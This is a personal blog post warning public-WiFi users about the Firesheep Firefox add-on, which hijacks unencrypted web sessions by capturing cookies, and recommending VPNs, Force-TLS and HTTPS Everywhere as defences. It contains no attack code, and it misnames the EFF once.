Firesheep allows you to easily capture Facebook and other unencrypted sessions on public hotspots.
This week, Seattle-based developer Eric Butler made available for download a pre-release version of a provocative add-on for Mozilla’s Firefox web browser. He calls it Firesheep, and it allows its user to easily hijack unencrypted sessions of any users who are on the same network segment. All users on public WiFi hotspots (such as at Starbucks) are vulnerable, any time they are using unencrypted transport protocols such as http. Mr. Butler has posted a well-written explanation of what Firesheep does.
Firesheep uses session hijacking.
This means that I would be vulnerable when using Hotmail or Yahoo Mail: they encrypt the username/password dialog (using https), but then use http for reading the mailbox. Acck! Gmail uses https (hyper text transport protocol secure) for the entire session, so Gmail users will remain secure from Firesheep session hijacking.
Use caution on public WiFi hotspots.
The Firesheep add-on shows you a list of all nearby users who are using your hotspot, and who is using sites such as Facebook, MySpace, and Twitter. Double-click on a name and you’ll see information about each user, including his/her picture for social networking sites. You are, together with the target user, logged in to the target’s Facebook/MySpace/etc session — you have hijacked that user’s session.
This works because many sites use https first, then switch to http, and give you an unencrypted cookie to identify you. Firesheep intercepts this cookie, saves a copy, and uses it to masquerade as the target user.
This will force responsible website owners who handle personal information to encrypt everything, including cookies, throughout a session, from end to end. In that respect, this is a good thing. Until then, don’t use public WiFi hotspots for anything personal unless you use them to transport encrypted packets over your company’s VPN. Also, the same vulnerability exists for your iPhone and other smartphones that use WiFi signals. Now that the cat is out of the bag, I’m sure that Hotmail, Facebook, Dropbox, et al will quickly respond by encrypting everything.
Near-term defenses: As a less than perfect defense against session hijacking, if you use the Mozilla Firefox web browser, you can use the Force-TLS add-on to force websites (if they are https capable) to use https . . . but this will work only if each website you visit supports https. (Most, including mine, don’t.) A defensive tool with promise is another Firefox add-on named HTTPS Everywhere, by the Electronic Freedom Foundation. Like Force-TLS, it will work only if the websites that you visit support https.
Visit my website: http://russbellew.com
© Russ Bellew · Fort Lauderdale, Florida, USA · phone 954 873-4695